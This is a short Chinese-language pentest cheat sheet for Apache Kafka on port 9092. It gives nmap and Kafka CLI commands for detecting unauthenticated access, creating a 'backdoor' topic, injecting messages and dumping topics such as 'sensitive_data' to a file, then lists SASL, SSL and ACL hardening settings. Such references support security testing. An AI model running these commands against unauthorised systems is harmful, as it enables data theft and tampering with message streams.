9092 - Apache Kafka 服务渗透测试

服务概述

Kafka 是分布式流处理平台。未授权访问、配置错误是主要安全问题。

默认端口: 9092 (TCP)
危害等级: ⭐⭐⭐

信息收集

服务识别

# nmap 扫描
nmap -sV -p 9092 TARGET

# 使用 kafka 客户端
kafka-topics.sh --bootstrap-server TARGET:9092 --list

未授权访问检测

# 列出主题
kafka-topics.sh --bootstrap-server TARGET:9092 --list

# 如果成功，无需认证

常见攻击手法

1. 未授权访问

利用:

# 列出主题
kafka-topics.sh --bootstrap-server TARGET:9092 --list

# 创建主题
kafka-topics.sh --bootstrap-server TARGET:9092 --create --topic backdoor

# 发送消息
kafka-console-producer.sh --bootstrap-server TARGET:9092 --topic target

# 消费消息
kafka-console-consumer.sh --bootstrap-server TARGET:9092 --topic target --from-beginning

2. 数据窃取

利用:

# 消费所有消息
kafka-console-consumer.sh --bootstrap-server TARGET:9092 --topic sensitive_data --from-beginning

# 导出到文件
kafka-console-consumer.sh --bootstrap-server TARGET:9092 --topic logs > dump.txt

防御建议

# 1. 启用 SASL 认证
# server.properties
security.inter.broker.protocol=SASL_PLAINTEXT
sasl.mechanism.inter.broker.protocol=PLAIN
sasl.enabled.mechanisms=PLAIN

# 2. 启用 SSL
# 加密通信

# 3. ACL 控制
# 限制主题访问

9092 - Apache Kafka 服务渗透测试

服务概述

信息收集

服务识别

未授权访问检测

常见攻击手法

1. 未授权访问

2. 数据窃取

防御建议

参考链接